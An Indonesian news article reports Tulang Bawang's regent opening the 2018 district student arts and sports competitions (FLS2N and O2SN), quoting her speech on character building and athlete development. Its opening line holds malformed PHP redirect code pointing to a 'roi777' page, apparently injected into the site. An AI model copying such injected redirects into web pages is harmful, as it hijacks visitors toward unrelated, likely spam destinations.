header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Bupati Winarti Buka Acara Festival Lomba Seni Siswa Nasional (FLS2N) dan Olimpiade Olahraga Siswa Nasional (O2SN) -
Bupati Winarti Buka Acara Festival Lomba Seni Siswa Nasional (FLS2N) dan Olimpiade Olahraga Siswa Nasional (O2SN)

TRANSLAMPUNG.COM, MENGGALA – Bupati Tulang Bawang, Winarti, membuka acara Festival Lomba Seni Siswa Nasional (FLS2N) dan Olimpiade Olahraga Siswa Nasional (O2SN) Kabupaten Tulang Bawang Tahun 2018.

Bupati Tulang Bawang, Winarti, mengatakan, bahwa sebagaimana bersama bahwa upaya peningkatan mutu pendidikan disekolah tidak hanya terfokus pada pencapaian kualitas akademik, akan tetapi juga menyangkut aspek non akademik, sehingga dengan begitu siswa diharapkan memperoleh pengalaman belajar yang utuh dan sesuai dengan karakteristik kebutuhan dan perkembangannya.

“Oleh karena itu, penyelenggaraan FLS2N dan O2SN ini merupakan salah satu wadah guna mengapresiasi kebutuhan non akademis siswa yang memiliki bakat dan minat khususnya dibidang olahraga, yang bertujuan untuk meningkatkan kondisi kesehatan jasmani siswa sehingga dapat menunjang peningkatan kualitas akademis di sekolah, juga bertujuan meningkatkan prestasi siswa dibidang olahraga,” katanya.

Winarti, juga mengatakan, dalam konteks yang lebih makro lagi, kegiatan FLS2N dan O2SN ini sebagai bagian dari system pembinaan olahraga yang bertujuan untuk menjaring bibit-bibit atlet berbakat dalam bidang olahraga, untuk dibina dan dikembangkan lebih terarah dan berkelanjutan menjadi atlet daerah, sehingga nantinya diproyeksikan untuk mengikuti ajang-ajang olahraga baik ditingkat lokal, regional maupun internasional.

“Berkaitan dengan itu, melalui penyelenggaraan FLS2N dan O2SN Tingkat Kabupaten Tulang Bawang ini, diharapkan dapat diperoleh hasil, meningkatnya kondisi kesehatan jasmani siswa dalam rangka menunjang peningkatan kualitas akademis.Terjaringnya bibit-bibit seni dan atlet berbakat  untuk dibina dan dikembangkan lebih terarah dan berkelanjutan, menghasilkan siswa terbaik di masing-masing cabang olahraga yang mampu berprestasi mengharumkan nama daerah Tulang Bawang,” ujarnya.

Lebih lanjut , Winarti, mengatakan, saya selaku pribadi dan atas nama Pemerintah Kabupaten Tulang Bawang, dengan penuh optimis menyambut baik penyelenggaraan FLS2N dan O2SN Tingkat Kabupaten Tulang Bawang ini. Kegiatan ini dapat dijadikan sebagai momen yang tepat dan sangat berharga bagi anak-anak kita untuk dapat berkreasi, berinovasi, berprestasi dan berkompetisi secara sehat sekaligus dapat memberikan pengalaman belajar yang baik, belajar bekerja sama, mematuhi aturan, mengakui kelemahan diri sendiri dan belajar menghargai kekuatan lawan.

“Saya berharap kepada anak-anakku sekalian agar nantinya mampu berprestasi pada ajang FLS2N dan O2SN yang lebih tinggi lagi baik pada Tingkat Provinsi maupun Tingkat Nasional. Untuk itu optimism disertai ikhtiar yang sungguh-sungguh senantiasa perlu kita tumbuhkan demi meraih hasil yang terbaik. Saya berpesan kepada anak-anakku sekalian, bertandinglah dengan penuh semangat dan sportivitas untuk menunjukkan prestasi terbaik, tercepat, terkuat dan terindah. Kepada para wasit untuk senantiasa memimpin setiap pertandingan secara professional, objektif dan menjunjung tinggi norma serta kehormatan wasit dan kepada para guru dan Pembina olahraga, mari kita jadikan momentum ini sebagai sarana evaluasi atas proses pembinaan prestasi anak-anak didik kita untuk lebih baik dan berprestasi,” tambahnya. (als)

News Reporter